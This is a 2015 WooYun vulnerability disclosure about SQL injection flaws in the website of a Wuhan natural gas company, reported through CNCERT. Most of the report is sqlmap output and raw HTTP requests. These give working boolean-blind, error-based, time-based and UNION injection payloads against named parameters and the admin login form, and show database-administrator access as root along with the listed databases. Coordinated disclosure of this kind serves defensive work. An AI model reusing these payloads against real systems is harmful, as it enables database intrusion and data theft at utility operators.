当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146621

漏洞标题:某市天然气有限公司sql注入漏洞打包

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-10-15 17:22

修复时间:2015-12-03 18:08

公开时间:2015-12-03 18:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-15: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经确认,细节仅向厂商公开
2015-10-29: 细节向核心白帽子及相关领域专家公开
2015-11-08: 细节向普通白帽子公开
2015-11-18: 细节向实习白帽子公开
2015-12-03: 细节向公众公开

简要描述:

RT

详细说明:

武汉市天然气有限公司
注入点,时间盲注 布尔型注入 报错注入

http://**.**.**.**/viewpages_main/ShowViewPagesThird.do?fcid=1ef635ad-95cd-4e73-b389-0929dc9b740d&classId=7c9a2258-f8d5-44c0-a008-8b078f718127


Place: GET
Parameter: fcid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fcid=1ef635ad-95cd-4e73-b389-0929dc9b740d' AND 8390=8390 AND 'XvHb'
='XvHb&classId=7c9a2258-f8d5-44c0-a008-8b078f718127
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: fcid=1ef635ad-95cd-4e73-b389-0929dc9b740d' AND (SELECT 7076 FROM(SE
LECT COUNT(*),CONCAT(0x3a6862713a,(SELECT (CASE WHEN (7076=7076) THEN 1 ELSE 0 E
ND)),0x3a6b6a7a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROU
P BY x)a) AND 'EMCC'='EMCC&classId=7c9a2258-f8d5-44c0-a008-8b078f718127
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: fcid=1ef635ad-95cd-4e73-b389-0929dc9b740d' AND SLEEP(5) AND 'VAqT'=
'VAqT&classId=7c9a2258-f8d5-44c0-a008-8b078f718127
Place: GET
Parameter: classId
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: fcid=1ef635ad-95cd-4e73-b389-0929dc9b740d&classId=7c9a2258-f8d5-44c
0-a008-8b078f718127' AND (SELECT 2982 FROM(SELECT COUNT(*),CONCAT(0x3a6862713a,(
SELECT (CASE WHEN (2982=2982) THEN 1 ELSE 0 END)),0x3a6b6a7a3a,FLOOR(RAND(0)*2))
x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ttxc'='Ttxc
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: fcid, type: Single quoted string (default)
[1] place: GET, parameter: classId, type: Single quoted string
[q] Quit
>
[10:38:41] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0
[10:38:41] [INFO] fetching current user
[10:38:41] [INFO] retrieved: root@localhost
current user:    'root@localhost'


dba权限

[10:40:47] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0
[10:40:47] [INFO] testing if current user is DBA
[10:40:47] [INFO] fetching current user
[10:40:47] [INFO] resumed: root@localhost
[10:40:47] [INFO] retrieved: 1
current user is DBA:    'True'


available databases [4]:
[*] information_schema
[*] mysql
[*] test
[*] whng


漏洞证明:

0x02

http://**.**.**.**/viewpages_main/ShowViewPagesSecond.do?id=bb447143-4c6d-4d3b-b4c8-d7a421f50f69


0x03

http://**.**.**.**/security_login/showAdminLogin.do


0JQ789V9LJ({4{B47Q0VQ@J.png


post包

POST /security_login/valiLoginUser.do HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/security_login/showAdminLogin.do
Content-Length: 31
Cookie: JSESSIONID=6EEB8CC07EE8E211353CA1E77E76CC0E
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
username=1+and+1%3D1&password=1


username参数存在报错注入
0x04
、在搜索框存在post注入

http://**.**.**.**/viewpages_main/SearchNews.do


先搜索正常字符1,返回

NLS3J2R)JJCI`8AK)F1`D4J.jpg


加简单测试语句单引号,报错了

6MIEK]SDJ7M3XEHB}FD6D2Q.png


sqlmap跑数据

Place: POST
Parameter: str
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: str=1' AND (SELECT 2163 FROM(SELECT COUNT(*),CONCAT(0x3a7974733a,(S
ELECT (CASE WHEN (2163=2163) THEN 1 ELSE 0 END)),0x3a67676d3a,FLOOR(RAND(0)*2))x
 FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eJRu'='eJRu
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: str=1' UNION ALL SELECT CONCAT(0x3a7974733a,0x6e766968744d634a7859,
0x3a67676d3a)# AND 'LiRZ'='LiRZ
---
[13:31:30] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[13:31:30] [INFO] fetching current user
current user:    'root@localhost'

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-19 18:07

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给湖北江分中心,由其后续协调网站管理单位处置。

最新状态:

暂无